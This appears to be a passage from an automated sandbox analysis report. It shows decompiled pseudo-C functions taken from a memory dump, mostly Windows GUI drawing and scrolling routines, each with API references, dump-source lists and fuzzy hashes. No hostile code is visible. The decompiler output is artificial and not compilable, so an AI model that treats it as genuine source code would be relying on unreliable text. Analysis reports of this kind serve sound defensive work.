                                                                        								__eflags = RectVisible(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
                                                                        								if(__eflags == 0) {
                                                                        									goto L39;
                                                                        								} else {
                                                                        									_v17 = _a4;
                                                                        									_t163 = E0045C608( *_t240, __eflags);
                                                                        									__eflags = _t163;
                                                                        									if(_t163 != 0) {
                                                                        										_t236 =  *_t240;
                                                                        										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
                                                                        										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
                                                                        											_t238 =  *_t240;
                                                                        											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
                                                                        											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
                                                                        												_t24 =  &_v17;
                                                                        												 *_t24 = _v17 | 0x00000002;
                                                                        												__eflags =  *_t24;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									_t242 = _a24 - 0x80;
                                                                        									_t166 = E0045B33C(_t257, _a24 - 0x80, _v16);
                                                                        									__eflags = _t166;
                                                                        									if(_t166 != 0) {
                                                                        										_t29 =  &_v17;
                                                                        										 *_t29 = _v17 | 0x00000001;
                                                                        										__eflags =  *_t29;
                                                                        									}
                                                                        									__eflags = _v17 & 0x00000002;
                                                                        									if((_v17 & 0x00000002) == 0) {
                                                                        										L14:
                                                                        										_t167 =  *_t240;
                                                                        										__eflags =  *((char*)(_t167 + 0x28c));
                                                                        										if( *((char*)(_t167 + 0x28c)) != 0) {
                                                                        											L16:
                                                                        											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
                                                                        											E0042062C( *((intOrPtr*)( *_t240 + 0x208)));
                                                                        											__eflags = _v17 & 0x00000001;
                                                                        											if(__eflags == 0) {
                                                                        												L20:
                                                                        												E0041FC50( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
                                                                        												L21:
                                                                        												E004202E8(_t260,  &_v49);
                                                                        												L22:
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
                                                                        												_t180 =  *_t240;
                                                                        												__eflags =  *((char*)(_t180 + 0x28c));
                                                                        												if( *((char*)(_t180 + 0x28c)) != 0) {
                                                                        													__eflags = _v17 & 0x00000004;
                                                                        													if((_v17 & 0x00000004) != 0) {
                                                                        														_t201 =  *_t240;
                                                                        														__eflags =  *((char*)(_t201 + 0x1a5));
                                                                        														if( *((char*)(_t201 + 0x1a5)) != 0) {
                                                                        															_t202 = _a24;
                                                                        															_t253 = _a24;
                                                                        															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
                                                                        															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
                                                                        																asm("movsd");
                                                                        																asm("movsd");
                                                                        																asm("movsd");
                                                                        																asm("movsd");
                                                                        																_t257 = _t257;
                                                                        																_t205 = _a24;
                                                                        																__eflags =  *(_t205 - 0x84) & 0x00000004;
                                                                        																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
                                                                        																	_t206 = _a24;
                                                                        																	__eflags =  *(_t206 - 0x84) & 0x00000008;
                                                                        																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
                                                                        																		_t88 =  &(_v65.bottom);
                                                                        																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
                                                                        																		__eflags =  *_t88;
                                                                        																	}
                                                                        																} else {
                                                                        																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
                                                                        																}
                                                                        																DrawEdge(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
                                                                        																DrawEdge(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        												_t181 =  *_t240;
                                                                        												__eflags =  *((char*)(_t181 + 0x28c));
                                                                        												if( *((char*)(_t181 + 0x28c)) != 0) {
                                                                        													_t182 =  *_t240;
                                                                        													__eflags =  *(_t182 + 0x1c) & 0x00000010;
                                                                        													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
                                                                        														__eflags = _v17 & 0x00000002;
                                                                        														if((_v17 & 0x00000002) != 0) {
                                                                        															_t183 =  *_t240;
                                                                        															_t252 =  *0x45d10c; // 0x2400
                                                                        															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45d10c);
                                                                        															if(_t252 != ( *(_t183 + 0x248) &  *0x45d10c)) {
                                                                        																__eflags =  *( *_t240 + 0x249) & 0x00000010;
                                                                        																if(__eflags == 0) {
                                                                        																	_t188 = E004037D8( *_t240, __eflags);
                                                                        																	__eflags = _t188;
                                                                        																	if(_t188 != 0) {
                                                                        																		asm("movsd");
                                                                        																		asm("movsd");
                                                                        																		asm("movsd");
                                                                        																		asm("movsd");
                                                                        																		_t257 = _t257;
                                                                        																		_v33.left = _v49.right;
                                                                        																		_v33.right = _v49.left;
                                                                        																		DrawFocusRect(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
                                                                        																	} else {
                                                                        																		DrawFocusRect(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        												goto L39;
                                                                        											}
                                                                        											__eflags = _v17 & 0x00000002;
                                                                        											if(__eflags == 0) {
                                                                        												L19:
                                                                        												E0041FC50( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
                                                                        												E0041F464( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
                                                                        												goto L21;
                                                                        											}
                                                                        											_t256 =  *0x45d108; // 0x0
                                                                        											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45d104);
                                                                        											if(__eflags == 0) {
                                                                        												goto L20;
                                                                        											}
                                                                        											goto L19;
                                                                        										}
                                                                        										_t232 =  *_t240;
                                                                        										__eflags =  *(_t232 + 0x1c) & 0x00000010;
                                                                        										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
                                                                        											goto L22;
                                                                        										}
                                                                        										goto L16;
                                                                        									}
                                                                        									_t233 =  *_t240;
                                                                        									__eflags =  *(_t233 + 0x249) & 0x00000004;
                                                                        									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
                                                                        										goto L14;
                                                                        									}
                                                                        									_t234 =  *_t240;
                                                                        									__eflags =  *((char*)(_t234 + 0x28d));
                                                                        									if( *((char*)(_t234 + 0x28d)) == 0) {
                                                                        										goto L14;
                                                                        									}
                                                                        									_t235 =  *_t240;
                                                                        									__eflags =  *(_t235 + 0x1c) & 0x00000010;
                                                                        									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
                                                                        										goto L39;
                                                                        									}
                                                                        									goto L14;
                                                                        								}
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
                                                                        						_t130 =  &_v16;
                                                                        						 *_t130 = _v16 + 1;
                                                                        						__eflags =  *_t130;
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t138;
                                                                        			}

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c8be4bc43f859d8c8afe2417128a037c4a7ad764e5036389b60e49141e276708
                                                                        • Instruction ID: a23f4c26fc7a9db08ee943cacd5cbd9e35e16fa5ad328059b8dc8150b4b01441
                                                                        • Opcode Fuzzy Hash: c8be4bc43f859d8c8afe2417128a037c4a7ad764e5036389b60e49141e276708
                                                                        • Instruction Fuzzy Hash: 6FB11A75A002599FDB10DF58C489BDEB7F5AF09309F1440A6EC44AB3A2C778AC4ACB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E0044F614(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _v8;
                                                                        				signed char _t92;
                                                                        				int _t98;
                                                                        				int _t100;
                                                                        				intOrPtr _t117;
                                                                        				int _t122;
                                                                        				intOrPtr _t155;
                                                                        				void* _t164;
                                                                        				signed char _t180;
                                                                        				intOrPtr _t182;
                                                                        				intOrPtr _t194;
                                                                        				int _t199;
                                                                        				intOrPtr _t203;
                                                                        				void* _t204;
                                                                        
                                                                        				_t204 = __eflags;
                                                                        				_t196 = __edi;
                                                                        				_t202 = _t203;
                                                                        				_v8 = __eax;
                                                                        				E0043961C(_v8);
                                                                        				_push(_t203);
                                                                        				_push(0x44f86a);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t203;
                                                                        				 *(_v8 + 0x268) = 0;
                                                                        				 *(_v8 + 0x26c) = 0;
                                                                        				 *(_v8 + 0x270) = 0;
                                                                        				_t164 = 0;
                                                                        				_t92 =  *0x496709; // 0x0
                                                                        				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                                                                        				E00438D8C(_v8, 0, __edx, _t204);
                                                                        				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                                                        					L12:
                                                                        					_t98 =  *(_v8 + 0x268);
                                                                        					_t213 = _t98;
                                                                        					if(_t98 > 0) {
                                                                        						E00435FC8(_v8, _t98, _t196, _t213);
                                                                        					}
                                                                        					_t100 =  *(_v8 + 0x26c);
                                                                        					_t214 = _t100;
                                                                        					if(_t100 > 0) {
                                                                        						E0043600C(_v8, _t100, _t196, _t214);
                                                                        					}
                                                                        					_t180 =  *0x44f878; // 0x0
                                                                        					 *(_v8 + 0x98) = _t180;
                                                                        					_t215 = _t164;
                                                                        					if(_t164 == 0) {
                                                                        						E0044EB7C(_v8, 1, 1);
                                                                        						E0043C730(_v8, 1, 1, _t215);
                                                                        					}
                                                                        					E00437760(_v8, 0, 0xb03d, 0);
                                                                        					_pop(_t182);
                                                                        					 *[fs:eax] = _t182;
                                                                        					_push(0x44f871);
                                                                        					return E00439624(_v8);
                                                                        				} else {
                                                                        					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                                                        						_t194 =  *0x496c08; // 0x215094c
                                                                        						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
                                                                        							_t155 =  *0x496c08; // 0x215094c
                                                                        							E0041F64C( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041F644( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
                                                                        						}
                                                                        					}
                                                                        					_t117 =  *0x496c08; // 0x215094c
                                                                        					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
                                                                        					_t199 = E0044F99C(_v8);
                                                                        					_t122 =  *(_v8 + 0x270);
                                                                        					_t209 = _t199 - _t122;
                                                                        					if(_t199 != _t122) {
                                                                        						_t164 = 1;
                                                                        						E0044EB7C(_v8, _t122, _t199);
                                                                        						E0043C730(_v8,  *(_v8 + 0x270), _t199, _t209);
                                                                        						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                                                        							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                                                                        						}
                                                                        						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                                                        							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                                                                        						}
                                                                        						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                                                        							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                                                                        							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                                                                        						}
                                                                        					}
                                                                        					goto L12;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044F6D3
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F74F
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F77E
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F7AD
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F7D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f83b6f54dddd89dbe0c70f2b225cc0d110cc9cf3e54e16450356abb0dd6b52aa
                                                                        • Instruction ID: b7fbed5c6db0269f7e2fea028abd8eb97cbe5c16f41f339bba14ab5bac44c86c
                                                                        • Opcode Fuzzy Hash: f83b6f54dddd89dbe0c70f2b225cc0d110cc9cf3e54e16450356abb0dd6b52aa
                                                                        • Instruction Fuzzy Hash: 2D71D574A04104EFDB00DBA9C589EADB3F5AF49304F2541F6E808EB362C739AE45DB44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E0045EFF4(void* __eax, int __ecx, signed int __edx, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				struct tagRECT _v28;
                                                                        				char _v44;
                                                                        				int _t90;
                                                                        				void* _t109;
                                                                        				void* _t125;
                                                                        				void* _t131;
                                                                        				intOrPtr _t142;
                                                                        				int _t143;
                                                                        
                                                                        				_t143 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t125 = __eax;
                                                                        				_t142 = _a4;
                                                                        				_v12 = 2;
                                                                        				if( *((char*)(__eax + 0x28c)) == 0) {
                                                                        					_v12 = _v12 | 0x00000004;
                                                                        				}
                                                                        				_t147 = _t143;
                                                                        				if(_t143 != 0) {
                                                                        					__eflags = _v8;
                                                                        					if(_v8 != 0) {
                                                                        						_t29 = _t142 + 0x34; // 0xe89c933
                                                                        						_t31 = _t142 + 0xc; // 0x895653ec
                                                                        						E00412BCC( *_t31, 0,  &_v28,  *_t29);
                                                                        						ScrollWindowEx(E0043CC2C(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
                                                                        						_t37 = _t142 + 0x3c; // 0x55894233
                                                                        						_t39 = _t142 + 4; // 0x55c35b5e
                                                                        						_t40 = _t142 + 0x34; // 0xe89c933
                                                                        						__eflags = 0;
                                                                        						E00412BCC( *_t39,  *_t40,  &_v28,  *_t37);
                                                                        						ScrollWindowEx(E0043CC2C(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                        						_t44 = _t142 + 0x3c; // 0x55894233
                                                                        						_t46 = _t142 + 0xc; // 0x895653ec
                                                                        						_t47 = _t142 + 0x34; // 0xe89c933
                                                                        						E00412BCC( *_t46,  *_t47,  &_v28,  *_t44);
                                                                        						_t90 = ScrollWindowEx(E0043CC2C(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                        					} else {
                                                                        						_t22 = _t142 + 0x3c; // 0x55894233
                                                                        						_t24 = _t142 + 0xc; // 0x895653ec
                                                                        						_t25 = _t142 + 0x34; // 0xe89c933
                                                                        						E00412BCC( *_t24,  *_t25,  &_v28,  *_t22);
                                                                        						_t90 = ScrollWindowEx(E0043CC2C(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                        					}
                                                                        				} else {
                                                                        					if(E004037D8(_t125, _t147) != 0) {
                                                                        						_t11 = _t142 + 0x3c; // 0x55894233
                                                                        						_push( *_t11);
                                                                        						_push( &_v28);
                                                                        						_t109 = E00435FB0(_t125);
                                                                        						_t13 = _t142 + 4; // 0x55c35b5e
                                                                        						_push(_t109 -  *_t13);
                                                                        						E00435FB0(_t125);
                                                                        						__eflags = 0;
                                                                        						_pop(_t131);
                                                                        						E00412BCC(_t131, 0);
                                                                        						_v8 =  ~_v8;
                                                                        					} else {
                                                                        						_t7 = _t142 + 0x3c; // 0x55894233
                                                                        						_t9 = _t142 + 0xc; // 0x895653ec
                                                                        						E00412BCC( *_t9, 0,  &_v28,  *_t7);
                                                                        					}
                                                                        					_t90 = ScrollWindowEx(E0043CC2C(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
                                                                        				}
                                                                        				_t149 =  *(_t125 + 0x249) & 0x00000010;
                                                                        				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
                                                                        					return _t90;
                                                                        				} else {
                                                                        					E00460800(_t125,  &_v44);
                                                                        					return E0045E6F0(_t125,  &_v44, _t149);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ScrollWindow
                                                                        • String ID:
                                                                        • API String ID: 2126015319-0
                                                                        • Opcode ID: 012e01d2e5b07f3e9b05cfdc662a801196811393e83e2eaebac9e87f70118fcb
                                                                        • Instruction ID: 7e4e7f4e2f5f89522f6d3bfcac37a2a193213212823b79a250b46dc624b20d20
                                                                        • Opcode Fuzzy Hash: 012e01d2e5b07f3e9b05cfdc662a801196811393e83e2eaebac9e87f70118fcb
                                                                        • Instruction Fuzzy Hash: EF51E171600509BBD700EEA5CD82FEFB7ACAF08304F405526BA05E7682DB74F955CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E004469BC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				void* _v16;
                                                                        				struct tagRECT _v32;
                                                                        				void* _t53;
                                                                        				int _t63;
                                                                        				CHAR* _t65;
                                                                        				void* _t76;
                                                                        				void* _t78;
                                                                        				int _t89;
                                                                        				CHAR* _t91;
                                                                        				int _t117;
                                                                        				intOrPtr _t127;
                                                                        				void* _t139;
                                                                        				void* _t144;
                                                                        				char _t153;
                                                                        
                                                                        				_t120 = __ecx;
                                                                        				_t143 = _t144;
                                                                        				_v16 = 0;
                                                                        				_v12 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t139 = __eax;
                                                                        				_t117 = _a4;
                                                                        				_push(_t144);
                                                                        				_push(0x446ba0);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t144 + 0xffffffe4;
                                                                        				_t53 = E00448820(__eax);
                                                                        				_t135 = _t53;
                                                                        				if(_t53 != 0 && E00449E5C(_t135) != 0) {
                                                                        					if((_t117 & 0x00000000) != 0) {
                                                                        						__eflags = (_t117 & 0x00000002) - 2;
                                                                        						if((_t117 & 0x00000002) == 2) {
                                                                        							_t117 = _t117 & 0xfffffffd;
                                                                        							__eflags = _t117;
                                                                        						}
                                                                        					} else {
                                                                        						_t117 = _t117 & 0xffffffff | 0x00000002;
                                                                        					}
                                                                        					_t117 = _t117 | 0x00020000;
                                                                        				}
                                                                        				E004043E0( &_v16, _v12);
                                                                        				if((_t117 & 0x00000004) == 0) {
                                                                        					L12:
                                                                        					E00404744(_v16, 0x446bc4);
                                                                        					if(_t153 != 0) {
                                                                        						E0041FD6C( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                                                        						__eflags =  *((char*)(_t139 + 0x3a));
                                                                        						if( *((char*)(_t139 + 0x3a)) != 0) {
                                                                        							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                                                        							__eflags = E0041F724( *((intOrPtr*)(_v8 + 0xc))) |  *0x446bc8;
                                                                        							E0041F730( *((intOrPtr*)(_v8 + 0xc)), E0041F724( *((intOrPtr*)(_v8 + 0xc))) |  *0x446bc8, _t136, _t139, _t143);
                                                                        						}
                                                                        						__eflags =  *((char*)(_t139 + 0x39));
                                                                        						if( *((char*)(_t139 + 0x39)) != 0) {
                                                                        							L24:
                                                                        							_t63 = E00404600(_v16);
                                                                        							_t65 = E004047F8(_v16);
                                                                        							DrawTextA(E00420730(_v8), _t65, _t63, _a12, _t117);
                                                                        							L25:
                                                                        							_pop(_t127);
                                                                        							 *[fs:eax] = _t127;
                                                                        							_push(0x446ba7);
                                                                        							return E00404348( &_v16);
                                                                        						} else {
                                                                        							__eflags = _a8;
                                                                        							if(_a8 == 0) {
                                                                        								OffsetRect(_a12, 1, 1);
                                                                        								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
                                                                        								_t89 = E00404600(_v16);
                                                                        								_t91 = E004047F8(_v16);
                                                                        								DrawTextA(E00420730(_v8), _t91, _t89, _a12, _t117);
                                                                        								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                                                        							}
                                                                        							__eflags = _a8;
                                                                        							if(_a8 == 0) {
                                                                        								L23:
                                                                        								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
                                                                        							} else {
                                                                        								_t76 = E0041EFA4(0x8000000d);
                                                                        								_t78 = E0041EFA4(0x80000010);
                                                                        								__eflags = _t76 - _t78;
                                                                        								if(_t76 != _t78) {
                                                                        									goto L23;
                                                                        								}
                                                                        								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
                                                                        							}
                                                                        							goto L24;
                                                                        						}
                                                                        					}
                                                                        					if((_t117 & 0x00000004) == 0) {
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						_v32.top = _v32.top + 4;
                                                                        						DrawEdge(E00420730(_v8),  &_v32, 6, 2);
                                                                        					}
                                                                        					goto L25;
                                                                        				} else {
                                                                        					if(_v16 == 0) {
                                                                        						L11:
                                                                        						E00404608( &_v16, 0x446bb8);
                                                                        						goto L12;
                                                                        					}
                                                                        					if( *_v16 != 0x26) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t153 =  *((char*)(_v16 + 1));
                                                                        					if(_t153 != 0) {
                                                                        						goto L12;
                                                                        					}
                                                                        					goto L11;
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00446A8B
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 00446ADC
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00446B11
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 00446B1E
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00446B85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Draw$OffsetRectText$Edge
                                                                        • String ID:
                                                                        • API String ID: 3610532707-0
                                                                        • Opcode ID: 85062a5ebc0655283848f6502ddf073e01523f4b758b7f32a43d0701a49e740e
                                                                        • Instruction ID: 6b641bb0bc6ef2255d17c86df0a205ba80bac31eaa022483ee7a4ef997933482
                                                                        • Opcode Fuzzy Hash: 85062a5ebc0655283848f6502ddf073e01523f4b758b7f32a43d0701a49e740e
                                                                        • Instruction Fuzzy Hash: 9E516770A006446FEB10EBA9C881B9F77E5DF46314F15816AF914F7391C73CAD418B1A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E0042B85C(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				int _t40;
                                                                        				CHAR* _t42;
                                                                        				int _t54;
                                                                        				CHAR* _t56;
                                                                        				int _t65;
                                                                        				CHAR* _t67;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr _t86;
                                                                        				struct tagRECT* _t91;
                                                                        				signed int _t93;
                                                                        				int _t94;
                                                                        				intOrPtr _t97;
                                                                        				signed int _t104;
                                                                        
                                                                        				_push(0);
                                                                        				_t93 = __ecx;
                                                                        				_t91 = __edx;
                                                                        				_t76 = __eax;
                                                                        				_push(_t97);
                                                                        				_push(0x42b9b2);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t97;
                                                                        				 *((intOrPtr*)( *__eax + 0x90))();
                                                                        				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
                                                                        					E00404608( &_v8, 0x42b9c8);
                                                                        				}
                                                                        				if( *((char*)(_t76 + 0x170)) == 0) {
                                                                        					_t104 = _t93;
                                                                        				}
                                                                        				_t94 = E00438890(_t76, _t93, _t104);
                                                                        				E0042062C( *((intOrPtr*)(_t76 + 0x160)));
                                                                        				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
                                                                        					_t40 = E00404600(_v8);
                                                                        					_t42 = E004047F8(_v8);
                                                                        					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
                                                                        				} else {
                                                                        					OffsetRect(_t91, 1, 1);
                                                                        					E0041F464( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000014);
                                                                        					_t54 = E00404600(_v8);
                                                                        					_t56 = E004047F8(_v8);
                                                                        					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
                                                                        					OffsetRect(_t91, 0xffffffff, 0xffffffff);
                                                                        					E0041F464( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000010);
                                                                        					_t65 = E00404600(_v8);
                                                                        					_t67 = E004047F8(_v8);
                                                                        					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
                                                                        				}
                                                                        				_pop(_t86);
                                                                        				 *[fs:eax] = _t86;
                                                                        				_push(0x42b9b9);
                                                                        				return E00404348( &_v8);
                                                                        			}


















                                                                        APIs
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 0042B8F6
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B92E
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0042B938
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B970
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B997
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: DrawText$OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 1886049697-0
                                                                        • Opcode ID: 662b6b3a40582923ac273cb24c9d502d2feb4a56df99f8a9edd9d85c2ba6a157
                                                                        • Instruction ID: 1d1b475f9fabfd745f91b6a763abeaaa6df454c933534dc2db13d73f98644ccc
                                                                        • Opcode Fuzzy Hash: 662b6b3a40582923ac273cb24c9d502d2feb4a56df99f8a9edd9d85c2ba6a157
